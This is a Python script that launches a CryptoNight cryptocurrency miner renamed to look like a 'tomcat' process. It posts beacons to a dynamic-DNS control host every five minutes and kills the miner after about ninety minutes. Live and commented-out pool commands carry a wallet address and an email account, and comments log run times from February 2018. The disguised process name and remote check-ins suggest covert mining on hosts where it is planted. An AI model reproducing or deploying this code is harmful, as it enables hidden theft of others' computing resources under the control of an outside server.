import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:03.516659
#2018-02-17 17:35:08.260076
#2018-02-17 19:24:06.771749
#2018-02-17 21:13:05.550073
#2018-02-17 22:57:05.686693
#2018-02-18 00:42:06.428006
#2018-02-18 02:31:06.007860
#2018-02-18 04:18:04.112838
#2018-02-18 06:09:04.454443
#2018-02-18 07:58:04.245150
#2018-02-18 09:46:03.491979
#2018-02-18 11:32:02.306740
#2018-02-18 13:17:06.754055
#2018-02-18 15:07:06.009961
#2018-02-18 16:54:01.303395
#2018-02-18 18:43:05.139547
#2018-02-18 20:30:04.448407
#2018-02-18 22:16:04.349819
#2018-02-19 00:05:07.682798
#2018-02-19 01:51:03.975151
#2018-02-19 03:38:06.034599
#2018-02-19 05:23:01.332455
#2018-02-19 07:09:07.518298
#2018-02-19 08:58:03.993235
#2018-02-19 10:46:07.404215
#2018-02-19 12:32:04.939718
#2018-02-19 14:21:06.058010
#2018-02-19 16:11:06.099443
#2018-02-19 17:58:02.065222
#2018-02-19 19:44:09.397748
#2018-02-19 21:31:08.529453
#2018-02-19 23:17:05.903444
#2018-02-20 01:03:05.424574
#2018-02-20 02:51:07.360935
#2018-02-20 04:40:08.151133
#2018-02-20 06:24:06.328445
#2018-02-20 08:09:03.697548
#2018-02-20 09:55:01.698502
#2018-02-20 11:40:07.747106
#2018-02-20 13:29:05.531770
#2018-02-20 15:14:01.459928
#2018-02-20 16:59:07.282503
#2018-02-20 18:48:08.097402
#2018-02-20 20:40:08.370661
#2018-02-20 22:26:08.215353
#2018-02-21 00:08:07.279987
#2018-02-21 01:55:06.213095
#2018-02-21 03:43:07.677329
#2018-02-21 05:33:02.068249
#2018-02-21 07:21:07.088481
#2018-02-21 09:06:01.556542
#2018-02-21 10:54:07.555033
#2018-02-21 12:41:04.128701
#2018-02-21 14:28:07.823292
#2018-02-21 16:13:09.991802
#2018-02-21 18:04:05.148190
#2018-02-21 19:50:07.624796
#2018-02-21 21:37:05.616222
#2018-02-21 23:25:07.085957
#2018-02-22 01:14:07.796241
#2018-02-22 03:04:07.710962
#2018-02-22 04:49:06.605088
#2018-02-22 06:34:06.301066
#2018-02-22 08:22:02.130285
#2018-02-22 10:11:02.088184
#2018-02-22 11:57:04.768098
#2018-02-22 13:42:07.282114
#2018-02-22 15:29:04.241167
#2018-02-22 17:15:10.284167
#2018-02-22 19:02:06.893191
#2018-02-22 20:54:08.016342
#2018-02-22 22:41:06.828270
#2018-02-23 00:28:08.671846
#2018-02-23 02:14:06.367295
#2018-02-23 03:59:07.554970
#2018-02-23 05:46:05.018754
#2018-02-23 07:36:05.772412
#2018-02-23 09:40:08.802802
#2018-02-23 11:44:10.597156
#2018-02-23 13:35:11.976499
#2018-02-23 15:22:08.439725
#2018-02-23 17:11:11.993363
#2018-02-23 18:58:04.326301
#2018-02-23 20:44:05.428827
#2018-02-23 22:32:04.484284
#2018-02-24 00:17:07.958416
#2018-02-24 02:08:06.031622
#2018-02-24 03:58:04.238512
#2018-02-24 05:43:08.771869
#2018-02-24 07:36:05.267670
#2018-02-24 09:21:01.759969
#2018-02-24 11:14:07.026825
#2018-02-24 13:03:07.350406
#2018-02-24 14:51:03.621457
#2018-02-24 16:42:05.278546
#2018-02-24 18:30:06.368604
#2018-02-24 20:16:06.758568
#2018-02-24 22:08:06.850016
#2018-02-25 01:06:05.814196
#2018-02-25 03:57:07.776075
#2018-02-25 06:41:08.150768
#2018-02-25 11:36:02.201630
#2018-02-25 13:16:01.880800
#2018-02-25 14:49:02.086951